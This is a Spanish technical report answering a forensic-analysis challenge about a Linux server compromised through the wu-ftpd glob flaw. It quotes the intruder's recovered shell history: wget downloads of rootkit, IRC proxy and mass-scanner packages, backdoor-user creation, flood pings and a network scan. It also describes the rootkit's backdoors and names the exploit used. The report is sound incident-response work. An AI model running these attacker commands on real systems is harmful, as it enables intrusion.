Вы находитесь на странице: 1из 48

Respuesta al

Reto de Anlisis Forense







Informe Tcnico

Diciembre de 2003


Tabla de Contenidos

TU0.UT TURESUMEN EJECUTIVOUT ........................................................................................ 1
TU1.UT TUINTRODUCCINUT .................................................................................................... 3
TU2.UT TUENTORNO DE INVESTIGACINUT ........................................................................ 5
TU3.UT TUPROCESO DE ANLISISUT ....................................................................................... 7
TU4.UT TUCRONOGRAMA DE ACTIVIDADESUT................................................................... 9
TU5.UT TUANLISIS DE ARTEFACTOSUT .............................................................................. 20
TU5.1.UT TUFICHEROS BAJ O /VAR/FTP/NERODUT ....................................................................... 20
TU5.2.UT TUFICHEROS BAJ O /ROOT/.,UT .................................................................................... 25
TU5.3.UT TUFICHEROS BAJ O /VAR/TMP/.,UT ............................................................................... 30
TU5.4.UT TUFICHEROS BAJ O /BIN, /USR/BIN Y OTROS DIRECTORIOS DEL SISTEMAUT.................. 31
TU5.5.UT TURESUMEN DE LA ACTIVIDAD IRCUT ....................................................................... 38
TU6.UT TUDIRECCIONES IP IMPLICADASUT....................................................................... 39
TU7.UT TUCONCLUSIONESUT................................................................................................... 41
TU7.1.UT TUCONCLUSIN 1UT ................................................................................................... 41
TU7.2.UT TUCONCLUSIN 2UT ................................................................................................... 41
TU7.3.UT TUCONCLUSIN 3UT ................................................................................................... 42
TU7.4.UT TUCONCLUSIN 4UT ................................................................................................... 42
TU8.UT TUREFERENCIASUT ...................................................................................................... 43
TU9.UT TUANEXOSUT .................................................................................................................. 44
TU9.1.UT TUMAIL ENVIADO EN INSTALACIN DE NERODUT ....................................................... 44

Informe tcnico Reto de Anlisis Forense

Pg. 1
0. Resumen ejecutivo
Este documento es el informe tcnico en respuesta al reto de anlisis
forense lanzado por RedIRIS en colaboracin con otras empresas en
Noviembre de 2003 a travs de su pgina web
HTUhttp://www.rediris.es/cert/ped/retoUTH.
El objetivo del mismo es el anlisis de un sistema Linux previamente
atacado y comprometido. Para ello, como nica informacin, se
proporcionaron las imgenes de las distintas particiones del sistema
comprometido.
Dichas imgenes fueron analizadas utilizando una combinacin de las
siguientes herramientas:

The Sleuth Kit[3] Conjunto de herramientas de anlisis
forense de libre distribucin.
Autopsy[2] Interfaz grfico para The Sleuth Kit.
Tambin de libre distribucin.
VMWare[1] Aplicacin comercial que permite emular
mquinas virtuales Intel x86.
Red Hat Linux[9] Muchos de los comandos del sistema
constituyen verdaderas herramientas de
anlisis forense.
Google[10] Buscador de informacin en la web.

Las evidencias encontradas indican que el incidente investigado puede
resumirse de la siguiente manera:
El sistema fue instalado y conectado a la red la tarde del
mircoles 21 de agosto de 2002.
Un atacante logr acceso como root al sistema explotando la
vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio
servidor de FTP "wu-ftpd". Esto sucedi el viernes 23 de agosto de
2002 a las 00:22:48 horas, poco ms de un da despus de su
instalacin.
A continuacin instal y ejecut parcialmente un paquete de
programas denominado "nerod.tgz". Este grupo de programas
constituan un "rootkit", destinado a la apertura de puertas
traseras y la ocultacin de las actividades del intruso.
Despus accedi al sistema utilizando una de sus puertas
traseras, cerr el camino a otros atacantes que intentaran
explotar la misma vulnerabilidad, e instal dos paquetes de
programas bajo "/root/.,": psybnc y awu. El primero es un
Informe tcnico Reto de Anlisis Forense

Pg. 2
conocido proxy de IRC que permite realizar conexiones IRC de
forma annima y el segundo es un conjunto de programas que
permiten el ataque automtico a multitud de sistemas con la
vulnerabilidad de wu-ftpd.
Finalmente, en una nueva conexin mediante una de sus puertas
traseras, el intruso descarg e instal dos nuevos paquetes de
programas, esta vez bajo "/var/.,": psybnc (una versin ms
reciente) y emech (manu.tgz). El primero es otra versin del
programa ya comentado, y el segundo es un cliente automtico
de IRC (IRC bot).
En paralelo, se registr cierta actividad de los proxies IRC
instalados por el atacante.
El mismo viernes 23 de agosto de 2002, desde las 12:33:15 hasta
las 15:36:30 se realizaron, por parte de los administradores del
sistema y en vivo, las copias de las particiones de disco del
sistema para su posterior anlisis.
El resto del presente informe detalla las evidencias encontradas, as
como el proceso de anlisis seguido.

Informe tcnico Reto de Anlisis Forense

Pg. 3
1. Introduccin
Este documento es la respuesta al reto de anlisis forense lanzado por
RedIRIS en colaboracin con otras empresas en Noviembre de 2003 a
travs de su pgina web HTUhttp://www.rediris.es/cert/ped/retoUTH.
El objetivo del mismo es el anlisis de un sistema Linux previamente
atacado y comprometido. Para ello como nica informacin se
proporcionan las imgenes de las distintas particiones del sistema
comprometido.
Aunque la normativa del reto no expone el detalle de los objetivos a
cubrir en el informe, s manifiesta como tres principales objetivos los
siguientes:
Quin ha realizado el ataque?
Cmo se realizo el ataque?
Qu hizo el atacante una vez dentro del sistema?
En el presente informe se intenta contestar a dichas preguntas, pero
manteniendo un orden tal que su contenido sea lo ms didctico
posible. Asimismo, la limitacin de mantener el informe a un mximo de
60 pginas obliga a realizar una breve sntesis de todo el trabajo
realizada. As pues, el esquema seguido para contestar al reto consta de
los siguientes apartados:

Entorno de Investigacin
El propsito de este captulo es detallar las herramientas empleadas en
el anlisis, as como la construccin del entorno de anlisis forense usado
para la investigacin.
Proceso de anlisis
En este apartado se detalla de forma resumida la secuencia de
actividades llevada a cabo para la obtencin de las evidencias objeto
del anlisis. Debido a la limitacin de espacio, su exposicin es muy
sinttica, puesto que relatar en detalle todas y cada una de las
acciones realizadas llevara aparejada mucha ms informacin.
Cronograma de actividades
El objeto de este captulo es mostrar todas las actividades realizadas por
el (los) atacante(s) de una forma secuencial, desde el inicio de las
mismas hasta la realizacin de las imgenes de las particiones. Se
muestra as de un vistazo qu es lo que hizo, cundo lo hizo y la
evidencia que soporta estos datos.
Anlisis de artefactos
En este captulo se analizan todos los ficheros creados en el sistema
como consecuencia del ataque, indicando su objetivo y cualquier otro
dato de inters relativo a los mismos.
Informe tcnico Reto de Anlisis Forense

Pg. 4

Direcciones IP implicadas
Se intenta aqu reflejar la informacin obtenida sobre las direcciones IP
que de una u otra manera se han visto implicadas en el incidente,
incluyendo la de quien quienes atacaron el sistema.
Conclusiones
Finalmente, este apartado aglutina los principales puntos que se
obtienen como consecuencia del anlisis efectuado.



Informe tcnico Reto de Anlisis Forense

Pg. 5

2. Entorno de investigacin
Para facilitar el anlisis del sistema facilitado en forma de imgenes de
particiones, creamos varios entornos de trabajo empleando vmware
workstation[1].
En primer lugar, en un disco instalamos Red Hat 9.0, junto con todas las
herramientas de anlisis forense a emplear (autopsy, tct, dde, etc...). A
continuacin, creamos un nuevo disco virtual de vmware de 4Gb y, con
ayuda de fdisk, creamos una serie de particiones con exactamente- el
mismo tamao que las imgenes obtenidas con dd proporcionadas en
el reto. Finalmente, copiamos con dd las imgenes a estas particiones
recin creadas. Con ello obtuvimos un disco virtual que contiene todos
los datos del reto.
La ventaja de crear un disco as es que, configurando la mquina virtual
de vmware para acceder al mismo en modo no-persistente, podemos
usar el mismo cuantas veces queramos despreocupndonos de la
posibilidad de alterar accidentalmente la evidencia proporcionada.
Adicionalmente, una ventaja no menor cuando se trabaja en equipo, es
que la auto-compresin que vmware hace con sus discos virtuales hizo
que el tamao terico de 4Gb tuviera cabida en un simple CD-ROM.
En segundo lugar, tras determinar que el sistema original era un Red Hat
7.1 Server, decidimos crear un segundo sistema virtual vware con un
RedHat 7.1 limpio que tuviera acceso al disco del reto, para poder de
forma fcil comparar el sistema analizado con respecto a uno estndar.
El disco imagen del reto no es arrancable, puesto que no tiene el
sector de boot configurado. As pues, decidimos configurar ese sector
adecuadamente y crear un tercer sistema virtual que nos permitiera
hacer anlisis dinmico de los posibles binarios que encontrsemos en l.
Para facilitar dicho anlisis, creamos un CD-ROM con las herramientas de
anlisis (y la mayora de comandos ms usados de Linux) compiladas
estticamente, y lo montamos en esta tercera mquina virtual.
El esquema siguiente resume los tres sistemas virtuales creados:
Informe tcnico Reto de Anlisis Forense

Pg. 6


Todos los discos virtuales (excepto en los casos en que ha sido necesario
realizar algn cambio) son montados como no persistentes para evitar
cualquier posibilidad de contaminacin de datos.
Para compartir informacin con el sistema host (el PC real sobre el que
se ejecuta vmware) , empleamos cuando es necesario los directorios
compartidos (Shared Folders) de vmware.
En el sistema de anlisis forense (Red Hat 9.0) incluimos tambin una
copia de los ficheros con las imgenes de las particiones del sistema a
analizar, de modo que Autopsy pudiera trabajar con ellos.

Re d Hat 9.0
+He rramie ntas
Anlisis Fo re nse
Re to
Re dIris
Re d Hat 7.1
Se rve r
Re to Re dIris
BOOTABLE
Share d
Fo lde r
CD-ROM co n
He rramie ntas
Anlisis
Informe tcnico Reto de Anlisis Forense

Pg. 7
3. Proceso de anlisis
De forma resumida, el proceso empleado en el anlisis del sistema
comprometido ha sido el siguiente:
1- Descargar las imgenes de las particiones desde HTUwww.rediris.esUTH y
verificar el checksum md5 facilitado para todas ellas.
2- Configuracin del entorno de investigacin, tal y como se describe
en el captulo anterior. Para ello fue necesario un primer montaje de
las particiones para determinar que se trataba de un sistema Red Hat
7.1 y averiguar los paquetes instalados mediante el comando
rpm q a --dbpath /iris/var/lib/rpm
(donde /iris es el punto de montaje de las particiones en nuestro
entorno vmware primario de investigacin) As ya fue posible instalar
un sistema Red Hat 7.1 limpio con lo misma configuracin.
3- Ejecucin de autopsy sobre las particiones, creando un nuevo caso
en Autopsy y dando de alta en l las imgenes del sistema a
analizar. La siguiente figura muestra el aspecto de Autopsy
ofreciendo las imgenes del sistema comprometido para su anlisis:

Con ello estamos ya en condiciones de obtener un cronograma bsico
desde el punto de vista de sistema de ficheros sobre el que investigar.
4 Obtener una primera lista de los ficheros modificados, de varias
formas:
4.1- Verificando la integridad de los paquetes rpm instalados,
mediante el comando:
rpm --verify a --root /iris
Informe tcnico Reto de Anlisis Forense

Pg. 8
4.2- Buscando los ficheros borrados en el sistema con la ayuda
de autopsy.
4.3- Obteniendo una lista de todos los ficheros en nuestro sistema
RedHat 7.1 limpio con su checksum md5 y comparndola con
una lista similar en el sistema objeto de anlisis.
5 Anlisis de los principales ficheros de log: /var/log/*, .bash_history,
etc...
6 A partir de aqu, el trabajo se vuelve bastante manual. Es evidente
que hay mucha actividad y cambios en el sistema que son normales y
no corresponden a actividad de ataque alguna, como instalacin del
sistema, escritura en ficheros de log, ejecucin de slocate desde cron,
etc... que aade mucho ruido a las evidencias recogidas.
Para el anlisis temporal hemos intentado verificar cualquier hiptesis
desde varias fuentes. Por ejemplo, comprobando la consistencia entre
los comandos que aparecen en /root/.bash_history y lo que indica el
timeline generado por autopsy.
En cuanto al anlisis de binarios y ficheros desconocidos, las
herramientas que hemos usado han incluido:
file, strings, objdump y grep para determinar el contenido de los
mismos.
strace, ltrace, gdb, para el anlisis dinmico de los binarios,
ejecutndolos siempre en el entorno controlado vmware.
y, en general, las tcnicas de anlisis descritas en
HTUhttp://www.honeynet.org/reverse/index.htmlUTH

Finalmente, sealar que, como siempre, una de las mayores
herramientas de ayuda a cualquier anlisis forense es
HTUhttp://www.google.comUTH .


Informe tcnico Reto de Anlisis Forense

Pg. 9

4. Cronograma de actividades
A continuacin se presenta, en forma de tabla, un sumario del
cronograma de actividades detectadas en el sistema:

Periodo
(Agosto
2002) Accin Evidencia Asociada
Mircoles 21
20:15:46 a
20:56:20
Instalacin del sistema operativo (Red Hat 7.1)

Datos: El fichero /etc/redhat-release contiene la versin del sistema
operativo:

# cat / mnt / r et o/ et c/ r edhat - r el ease
Red Hat Li nux r el ease 7. 1 ( Seawol f )
#

Ese dato es corroborado por el fichero /var/log/dmesg, y por la lista
de paquetes instalados en el sistema segn la base de datos de
RPM. Ordenndolos por fecha de instalacin, se obtiene la franja
horaria en la que se produjo la instalacin del sistema:

# r pm- qa - - dbpat h / mnt / r et o/ var / l i b/ r pm- - l ast
wget - 1. 5. 3- 1 Fr i 23 Aug 2002 12: 25: 45 AM CEST
zl i b- devel - 1. 1. 3- 22 Wed 21 Aug 2002 08: 56: 20 PM CEST
ypser v- 1. 3. 11- 13 Wed 21 Aug 2002 08: 56: 18 PM CEST
[ . . . ]
i ndexht ml - 7. 1- 2 Wed 21 Aug 2002 08: 17: 43 PM CEST
gl i bc- common- 2. 2. 2- 10 Wed 21 Aug 2002 08: 17: 39 PM CEST
ghost scr i pt - f ont s- 5. 50- 3 Wed 21 Aug 2002 08: 15: 46 PM CEST
#

El ltimo paquete instalado, wget-1.5.3-1, fue instalado a posteriori
por un intruso, tal y como se muestra ms adelante.

La lista ordenada de accesos a ficheros del sistema, construida
mediante la opcin "Timeline" de Autopsy, corrobora la franja
horaria en la que se produjo la instalacin del sistema.

J ueves 22
(todo el da)
El sistema recibe algunas conexiones a los servicios FTP y SSH, sin
consecuencias.
Por lo dems, actividad normal del sistema, correspondiente a los trabajos
planificados mediante "cron".



Datos: Del fichero /var/log/messages:

Aug 22 08: 17: 25 l ocal host f t pd[ 6586] : FTP sessi on cl osed
Aug 22 08: 24: 29 l ocal host f t pd[ 6589] : FTP sessi on cl osed

Aug 22 06: 26: 29 l ocal host f t pd[ 6590] : ANONYMOUS FTP LOGI N FROM
Informe tcnico Reto de Anlisis Forense

Pg. 10
Periodo
(Agosto
2002) Accin Evidencia Asociada
218. 146. 115. 18 [ 218. 146. 115. 18] , mozi l l a@
Aug 22 08: 30: 43 l ocal host f t pd[ 6595] : l ost connect i on t o a213-
84- 155- 131. adsl . xs4al l . nl [ 213. 84. 155. 131]
Aug 22 08: 30: 43 l ocal host f t pd[ 6595] : FTP sessi on cl osed
Aug 22 08: 31: 37 l ocal host f t pd[ 6596] : l ost connect i on t o a213-
84- 155- 131. adsl . xs4al l . nl [ 213. 84. 155. 131]
Aug 22 08: 31: 37 l ocal host f t pd[ 6596] : FTP sessi on cl osed
Aug 22 13: 12: 00 l ocal host f t pd[ 6733] : FTP sessi on cl osed
Aug 22 23: 31: 01 l ocal host f t pd[ 7019] : FTP sessi on cl osed
Aug 22 23: 37: 55 l ocal host f t pd[ 7020] : FTP sessi on cl osed
Aug 23 00: 12: 15 l ocal host f t pd[ 7045] : FTP sessi on cl osed
Aug 23 00: 19: 19 l ocal host f t pd[ 7046] : FTP sessi on cl osed

Del fichero /var/log/secure, adems de las conexiones FTP ya
mostradas:

Aug 22 19: 16: 07 l ocal host sshd[ 6902] : Di d not r ecei ve
i dent i f i cat i on st r i ng f r om195. 116. 20. 232.
Aug 22 20: 16: 07 l ocal host sshd[ 649] : Gener at i ng new 768 bi t
RSA key.
Aug 22 20: 16: 08 l ocal host sshd[ 649] : RSA key gener at i on
compl et e.

El resto de la actividad mostrada por el "Timeline" de Autopsy, se
explica por los trabajos normales del sistema, ejecutados por cron
(/etc/cron.hourly, /etc/cron.daily, /etc/cron.d)

Viernes 23
00:22:48
Un atacante remoto logra acceso como root al sistema explotando la
vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio servidor de FTP
"wu-ftpd".
El atacante utiliza el exploit 7350wurm o una variacin del mismo, que
proporciona una shell interactiva de root en el sistema atacado si ste es
vulnerable.
El ataque fue es lanzado desde la direccin IP 200.47.186.114.



Datos: El log del sistema /var/log/syslog, muestra unas conexiones FTP
annimas desde la direccin IP 200.47.186.114 y a continuacin la
parada del servicio de registro de mensajes del sistema (syslog). Por
algn error en la aplicacin de las zonas horarias por parte del
demonio wu-ftpd, la fecha y hora de los dos primeros mensajes
estn desplazados dos horas en el tiempo: "Aug 22 22:21"
corresponde en realidad a "Aug 23 00:21":

Aug 22 22: 21: 05 l ocal host f t pd[ 7049] : ANONYMOUS FTP LOGI N FROM
200. 47. 186. 114 [ 200. 47. 186. 114] , mozi l l a@
Aug 22 22: 22: 48 l ocal host f t pd[ 7052] : ANONYMOUS FTP LOGI N FROM
200. 47. 186. 114 [ 200. 47. 186. 114] , mozi l l a@
Aug 23 00: 25: 03 l ocal host ker nel : Ker nel l oggi ng ( pr oc)
st opped.
Aug 23 00: 25: 03 l ocal host ker nel : Ker nel l og daemon
t er mi nat i ng.
ago 23 00: 25: 04 l ocal host sysl og: kl ogd shut down succeeded
Aug 23 00: 25: 04 l ocal host exi t i ng on si gnal 15

Obsrvese que la contrasea suministrada por el atacante en los
Informe tcnico Reto de Anlisis Forense

Pg. 11
Periodo
(Agosto
2002) Accin Evidencia Asociada
accesos annimos a FTP: "mozilla@". Esto indica que probablemente
utiliz el exploit de TESO (7350wurm) o alguna variacin el mismo, ya
que ste utiliza el nombre de usuario "ftp" y la contrasea "mozilla@"
para lograr acceso FTP annimo. Adems, una copia de ese exploit
fue introducida posteriormente en el sistema por el atacante, en
"/root/.,/aw/wu"TP
1
PT. El exploit, tanto una versin compilada como su
cdigo fuente, estn disponibles en las siguientes direcciones:

TUhttp:/ / packetstormsecurity.nl/removed/ 7350wurm.desc
Uhttp://packetstormsecurity.nl/removed/7350wurm
Uhttp:/ / packetstormsecurity.nl/0205-exploits/ 7350wurm.cU

El log /var/log/secure confirma estos accesos annimos y muestra
una serie de escaneos previos desde la misma direccin IP:

Aug 23 00: 12: 13 l ocal host xi net d[ 812] : START: f t p pi d=7045
f r om=200. 47. 186. 114
Aug 23 00: 12: 15 l ocal host xi net d[ 812] : EXI T: f t p pi d=7045
dur at i on=2( sec)
Aug 23 00: 19: 18 l ocal host xi net d[ 812] : START: f t p pi d=7046
f r om=200. 47. 186. 114
Aug 23 00: 19: 19 l ocal host xi net d[ 812] : EXI T: f t p pi d=7046
dur at i on=1( sec)
Aug 23 00: 21: 04 l ocal host xi net d[ 812] : START: f t p pi d=7049
f r om=200. 47. 186. 114
Aug 23 00: 22: 47 l ocal host xi net d[ 812] : START: f t p pi d=7052
f r om=200. 47. 186. 114

La lista ordenada de accesos a ficheros del sistema, construida
mediante la opcin "Timeline" de Autopsy, muestra los siguientes
accesos durante ese tiempo:

Fr i Aug 23 2002 00: 22: 47 2132 m. c
- / - r w- - - - - - - r oot / ssh r oot 12054 / var / l og/ secur e
Fr i Aug 23 2002 00: 22: 48 4096 mac
- / - r w- r - - r - - r oot / ssh r oot 38169 / var / r un/ f t p. r i ps- al l
168 . a.
- / - r w- - - - - - - r oot / ssh r oot 28245 / et c/ f t puser s
104 . a.
- / - r w- - - - - - - r oot / ssh r oot 28244 / et c/ f t phost s
Fr i Aug 23 2002 00: 24: 19 544317 m. c
- / - r w- r - - r - - r oot / ssh r oot 30143 / var / f t p/ ner od. t ar . gz

Ntese que tras el acceso annimo a FTP de las 00:22:48, enseguida
aparece la creacin del fichero "/var/ftp/nerod.tar.gz", sin duda
instalado por el intruso, como se describe en el siguiente tramo de
este cronograma. Informacin detallada sobre el fichero puede
encontrarse en la seccin "Anlisis de artefactos".

La vulnerabilidad, que fue publicada en abril de 2001, se describe
en los siguientes boletines de seguridad:

TP
1
PT Vase seccin "anlisis de artefactos".
Informe tcnico Reto de Anlisis Forense

Pg. 12
Periodo
(Agosto
2002) Accin Evidencia Asociada

Uhttp://www.cert.org/advisories/CA-2001-33.html
Uhttp://www.kb.cert.org/vuls/id/886083
Uhttp://www.kb.cert.org/vuls/id/AAMN-54WPCS
Uhttp://rhn.redhat.com/errata/RHSA-2001-157.html
Uhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0550U

La direccin IP desde la cul se lanz el ataque, 200.47.186.114,
carece de nombre asociado y pertenece a un proveedor de
servicios de Internet localizado en Per
(Uhttp://www.comsat.com.peU).TP
2
PT. La seccin "6 Direcciones IP implicadas"
ofrece ms informacin sobre esta direccin IP.

Viernes 23
(omitido en
adelante)
00:22:48
a
00:26:08
El intruso copia al sistema el fichero /var/ftp/nerod.tar.gz, lo descomprime y
ejecuta el script de instalacin. Esto da lugar a todos los ficheros presentes
en el sistema bajo /var/ftp/nerod, y que se analizan en profundidad en la
seccin "Anlisis de artefactos".

En resumen se trata de un rootkit con diversas utilidades, que entre otras
cosas instala un par de puertas traseras: aade el usuario "ssh" con UID 0, por
tanto equivalente a root, instala un servidor SSH que no guarda ningn tipo
de informacin de registro, escuchando en el puerto 1981, y una shell
escuchando en el puerto 465 (smtps) que simula un servidor Sendmail.
Informacin ms detallada en la seccin "Anlisis de artefactos".

No obstante, la ejecucin del script de instalacin es abortada a mitad de
ejecucin, justo tras enviar un correo electrnico con informacin sobre el
sistema a la direccin frumosu99us@yahoo.com. Posiblemente el atacante
aborta la ejecucin pulsando CTRL-C al darse cuenta de que la instalacin
enva correo a direcciones posiblemente no controladas por l.



Datos: Ese mail enviado, aunque fue borrado automticamente por el
sistema tras su envo, es recuperable de la zona libre de disco de la
particin /var, utilizando Autopsy. En la seccin final de este informe
se puede encontrar un anexo con el contenido de dicho mensaje.

Tanto la descompresin del rootkit como la ejecucin de su script
de instalacin y la interrupcin de dicha ejecucin en el punto
indicado se confirman observando los accesos a ficheros
registrados (Timeline de Autopsy).



TP
2
PT Tanto la ausencia de asociacin de nombre como la pertenencia de la direccin IP analizada al proveedor
de servicios indicado, corresponden a la actualidad (diciembre 2003), dado que no existe un registro que
permita conocer la trayectoria histrica de cada direccin IP, sino slo las asignaciones actuales.
Informe tcnico Reto de Anlisis Forense

Pg. 13
Periodo
(Agosto
2002) Accin Evidencia Asociada
00:27:09
a
00:27:31
Tras una pausa de 1 minuto, aade un usuario al sistema ("nerod") con su
correspondiente contrasea, usando los comandos adduser y passwd.

Datos: En la particin de swap (Unit 352 (4096 bytes) in images/ 192.168.3.10-
hda9.dd ) se puede encontrar el siguiente mensaje:

<38>Aug 23 00: 27: 09 adduser [ 7397] : new gr oup: name=ner od,
gi d=501

Y el timeline de Autopsy muestra los siguientes accesos a ficheros:


Fr i Aug 23 2002 00: 27: 09 124 . a. - / - r w- r - - r - - r oot / ssh
r oot 40166 / et c/ skel / . bashr c
747 mac - / - r w- r - - r - - ner od
ner od 63365 / home/ ner od/ . emacs
224 mac - / - r w- r - - r - - ner od
ner od 63363 / home/ ner od/ . bash_pr of i l e
400 m. . - r - - - - - - - - r oot / ssh r oot
28264 <192. 168. 3. 10- hda8. dd- dead- 28264>
124 mac - / - r w- r - - r - - ner od
ner od 63364 / home/ ner od/ . bashr c
[ . . . ]
4096 m. c d/ dr wx- - - - - - ner od
ner od 63361 / home/ ner od
24 mac - / - r w- r - - r - - ner od
ner od 63362 / home/ ner od/ . bash_l ogout
3728 . a. - / - r w- r - - r - - r oot / ssh
r oot 40184 / et c/ skel / . scr eenr c
52348 . a. - / - r wxr - xr - x r oot / ssh
r oot 159006 / usr / sbi n/ user add
96 . a. - / - r w- - - - - - - r oot / ssh
r oot 40163 / et c/ def aul t / user add
7 . a. l / l r wxr wxr wx r oot / ssh
r oot 158994 / usr / sbi n/ adduser - > user add
[ . . . ]
13536 . a. - / - r - s- - x- - x r oot / ssh
r oot 159701 / usr / bi n/ passwd
13137 . a. - / - r wxr - xr - x r oot / ssh
r oot 6041 / l i b/ secur i t y/ pam_env. so
210 . a. - / - r w- r - - r - - r oot / ssh
r oot 60254 / et c/ pam. d/ ot her
211 . a. - / - r w- r - - r - - r oot / ssh
r oot 60256 / et c/ pam. d/ passwd
[ . . . ]
Fr i Aug 23 2002 00: 27: 13 1024 . a. - / - r w- r - - r - - r oot / ssh
r oot 175310 / usr / l i b/ cr ackl i b_di ct . hwm
Fr i Aug 23 2002 00: 27: 29 42116 . a. - / - r w- r - - r - - r oot / ssh
r oot 175312 / usr / l i b/ cr ackl i b_di ct . pwi
828334 . a. - / - r w- r - - r - - r oot / ssh
r oot 175311 / usr / l i b/ cr ackl i b_di ct . pwd
Fr i Aug 23 2002 00: 27: 31 856 m. . - / - r w- - - - - - - r oot / ssh
r oot 28261 / et c/ shadow-
1044 m. . - r w- r - - r - - r oot / ssh r oot
28265 <192. 168. 3. 10- hda8. dd- dead- 28265>
1044 m. . - / - r w- - - - - - - r oot / ssh
r oot 28123 / et c/ passwd-


00: 56:20
a
00: 56:39
Tras una pausa de 30 minutos, el intruso vuelve a conectarse al sistema
usando una de sus puertas traseras.
Informe tcnico Reto de Anlisis Forense

Pg. 14
Periodo
(Agosto
2002) Accin Evidencia Asociada

Crea el directorio "/root/.,".

Intenta descargar dos paquetes de herramientas deU www.geocities.comU,
pero sin xito. Comete errores de tecleo (geocitites en vez de geocities).

Borra el usuario "ftp" del sistema, usando el comando "userdel". Adems,
incluye los nombres de usuario "ftp", "anonymous" y "ssh" en el fichero
/etc/ftpusers para que no se puedan utilizar para hacer conexiones FTP. De
esta manera, no ser posible realizar conexiones FTP annimas al sistema y
por tanto no ser posible aprovechar la vulnerabilidad de wu-ftpd sin
conocer un nombre de usuario y su contraseaTP
3
PT.


Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y
se corresponde perfectamente con lo que se puede observar en los
accesos a ficheros del timeline de Autopsy:

w
mkdi r . ,
cd . ,
f t p
f t p www. 0cat ch. com
wget www. geoci t i t es. com/ neal a19/ psybnc2. 2. 2. t ar . gz
wget www. geoci t i t es. com/ neal a19/ psybnc
wget www. geoci t i es. com/ mast er 0n/ awu. t gz
wget www. geoci t i es. com/ mast er 0n/ awu. t gz
echo f t p >> / et c/ f t puser s
echo anonymous >> / et c/ f t puser s
echo ssh >> / et c/ f t puser s
echo ssh >> / et c/ f t p
echo ssh >> / et c/ ssh
/ usr / sbi n/ user del f t p

01:16:55
a
01:28:32

Tras una pausa de 20 minutos, el intruso copia, descomprime y ejecuta un
nuevo paquete de software: /root/.,/psyBNC.tar.gz.

Se trata de un conocido proxy de IRC, que permite mantener conexiones de
forma annima, entre otras funcionalidades. En el apartado "Anlisis de
artefactos" se ofrece informacin ms detallada.

Nota: En realidad la pausa es de algo menos de 20 minutos, ya que hay que
descontar el tiempo que durara la descarga del programa.


Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y
se corresponde perfectamente con lo que se puede observar en los
accesos a ficheros del timeline de Autopsy:

wget www. geoci t i es. com/ gavi sh19/ psyBNC. t ar . gz
f t p
t ar zxvf psyBNC. t ar . gz

TP
3
PT Para explotar la vulnerabilidad de wu-ftpd glob es necesario autentificarse primero ante el servidor de
FTP, aunque sea de manera annima.
Informe tcnico Reto de Anlisis Forense

Pg. 15
Periodo
(Agosto
2002) Accin Evidencia Asociada
cd psybnc
makew
make
. / psybnc

01:41:51
a
01:46:19

Tras una pausa de 13 minutos, el intruso copia, descomprime y ejecuta un
nuevo paquete de software: /root/.,/awu.tgz. No obstante, antes de la
descarga, comprueba cunto tiempo lleva arrancado el sistema (comando
"uptime"), si hay alguien ms conectado al sistema (comando "w"), y la
conectividad con la direccin IP 80.96.22.169 usando el comando "ping".
Una vez instalado el paquete awu, el intruso se desconecta.

Se trata de un "scanner" que automatiza la intrusin en sistemas con wu-ftpd
vulnerable. En el apartado "Anlisis de artefactos" se ofrece informacin ms
detallada.

El intruso ejecut el programa "awu" contra la red "12.216.0.0/16" (comando
"./awu 12.216) pero interrumpi su ejecucin al poco tiempo pulsando CTRL-
C y abandon el sistema con exit.

Nota: En realidad la pausa es de algo menos de 13 minutos, ya que hay que
descontar el tiempo que durara la descarga del programa.


Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y
se corresponde perfectamente con lo que se puede observar en los
accesos a ficheros del timeline de Autopsy:

upt i me
w
pi ng - f - s6000 80. 96. 22. 169
pi ng - f - s6000 80. 96. 22. 169
l s
cd . ,
l s
wget www. geoci t i es. com/ mast er 0n/ awu. t gz
t ar zxvf awu. t gz
cd aw
. / awu 12. 216
cexi t
exi t

Adems, estos comandos tambin se pueden observar en la
particin de swap del sistema analizado.

03:19:51
a
03:45:36
Tras una franja de dos horas sin actividad reflejada en los ltimos accesos
ficheros, se observa actividad espordica de "psybnc". En la seccin
"Resumen de la actividad IRC" se ofrecen detalles sobre esta actividad.

Datos: Timeline de Autopsy:

Fr i Aug 23 2002 03: 19: 51 0 mac - / - r w- - - - - - - r oot / ssh
r oot 56292 / r oot / . , / psybnc/ l og/ USER2. TRL
1024 m. c d/ dr wxr wxr - x pepel u
pepel u 56278 / r oot / . , / psybnc/ l og
Fr i Aug 23 2002 03: 23: 56 1564 ma. - / - r w- - - - - - - r oot / ssh
Informe tcnico Reto de Anlisis Forense

Pg. 16
Periodo
(Agosto
2002) Accin Evidencia Asociada
r oot 56293 / r oot / . , / psybnc/ mot d/ USER2. MOTD. ol d
Fr i Aug 23 2002 03: 44: 38 1561 ma. - / - r w- - - - - - - r oot / ssh
r oot 42362 / r oot / . , / psybnc/ psybnc. conf . ol d
Fr i Aug 23 2002 03: 45: 36 286 . a. - / - r w- - - - - - - r oot / ssh
r oot 42367 / r oot / . , / psybnc/ USER1. LOG


04:02:00
a
04:03:59
Actividad normal de cron.

Datos: Timeline de Autopsy.

09:11:17
a
09:50:42
De nuevo actividad espordica de "psybnc". En la seccin "Resumen de la
actividad IRC" se ofrecen detalles sobre esta actividad.

Datos: Timeline de Autopsy.

10:17:03
a
10:20:42

Nueva sesin interactiva de un intruso.

Posiblemente se trate de un segundo intruso aprovechando alguna de las
puertas traseras dejadas por el primer intruso, ya que en esta nueva sesin,
quien fuera que estuviera conectado instal una segunda copia de
"psybnc", en un directorio distinto: "/var/tmp/.,". Otra indicacin de que se
tratara de personas distintas se obtiene al comparar los canales y "nicks"
utilizados en las sesiones de IRC por ambas copias de psybnc, que resultan
ser distintos. Sin embargo, la eleccin del nombre del directorio ".," indica
que podra tratarse de la misma persona o alguien de su crculo.

Sea el mismo intruso o uno diferente, seguiremos refirindonos a l como "el
intruso".

En esta ocasin, el intruso instala dos paquetes de programas: una nueva
copia de psybnc ("psy.tgz"), como ya se ha comentado, y otro paquete
llamado "manu.tgz".

Psybnc, como ya se ha indicado, se trata de un conocido proxy de IRC, que
permite mantener conexiones de forma annima, entre otras
funcionalidades.

El paquete "manu.tgz" contiene el programa "emech", que es un "IRC bot"
(cliente automtico de IRC). El binario "emech" est renombrado a "httpd",
probablemente para intentar pasar desapercibido con el nombre de un
